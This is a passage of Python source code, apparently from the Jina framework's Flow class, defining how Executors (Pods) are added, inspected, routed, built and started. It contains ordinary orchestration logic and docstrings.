quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
        :param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if not isinstance(endpoint, (list, tuple)):
raise ValueError(f'endpoint={endpoint} is not parsable')
for s in endpoint:
if s == pod_name:
raise FlowTopologyError(
                'the input/output of a pod can not be itself'
)
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = {op_flow._inspect_pods.get(ep, ep) for ep in endpoint}
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if not self._last_changed_pod or name != self.last_pod:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
args.connect_to_predecessor = False
args.noblock_on_start = True
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
        Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
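    # Illustrative sketch (assumption, not part of the original source): how
    # `add`, `needs` and `needs_all` compose a branching topology.
    #
    #   f = (Flow()
    #        .add(name='p1')
    #        .add(name='p2', needs='gateway')
    #        .needs_all())          # joins the hanging Pods p1 and p2
    #   with f:
    #       ...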
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
        :param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
        :param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
        :param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows access within the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
        :param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context-managed by the Flow.
        :param force: If set, always pull the latest Hub Executor bundle even if it exists locally
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
          - To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
        :param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
          Note: `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee successful execution of the rest of the flow. If something
          goes wrong upstream, it is hard to carry the exception forward without side effects.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `shards>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
        :param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
          When used in Python, one can additionally use the following values:
          - a Python dict that represents the config
          - a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
        :param uses_before: The executor attached before the Peas described by --uses, typically used before sending to all shards, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
args.zmq_identity = None
# BACKWARDS COMPATIBILITY:
# We assume that this is used in a search Flow if replicas and shards are used
# Thus the polling type should be all
        # But don't override any user-provided polling
if args.replicas > 1 and args.shards > 1 and 'polling' not in kwargs:
args.polling = PollingType.ALL
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
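    # Illustrative sketch (assumption, not part of the original source): hanging
    # an evaluator off the last Pod with `inspect` without altering the main
    # data path. 'MyEvaluator' is a hypothetical Executor name.
    #
    #   f = (Flow(inspect='COLLECT')
    #        .add(name='encoder')
    #        .inspect(name='eval', uses='MyEvaluator'))
    #
    #   # Building the same code with Flow(inspect='REMOVE') drops the
    #   # inspect Pods entirely.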
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket:
# https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
if end not in graph.pods:
end = end + '_head'
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
for start in pod.needs:
start_pod = self._pod_nodes[start]
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
if start not in graph.pods:
start = start + '_tail'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
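# Note (added): the resulting routing graph always begins at 'start-gateway' and
# ends at 'end-gateway'; other Pods contribute one node per deployment, and
# endpoints that are not found fall back to their '<name>_head' / '<name>_tail'
# deployments.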
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told to do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# dynamic routing does not apply to shards in a CompoundPod, only its tail
if not isinstance(self._pod_nodes[pod], CompoundPod):
self._pod_nodes[pod].update_pea_args()
else:
self._pod_nodes[pod].tail_args.routing_table = self._pod_nodes[
pod
].args.routing_table
self._pod_nodes[
pod
].tail_args.static_routing_table = self.args.static_routing_table
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if no_inspect is set, then all inspect-related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with the inspected Pod,
# but leave the inspect-related nodes themselves untouched
if op_flow.args.inspect.is_keep:
pod.needs = {
ep
if pod.role.is_inspect
else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
}
else:
pod.needs = {reverse_inspect_map.get(ep, ep) for ep in pod.needs}
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double-check whether this is intentional or a mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why, but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pods get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted because {error_pods} cannot be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Equality is defined by whether two Flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
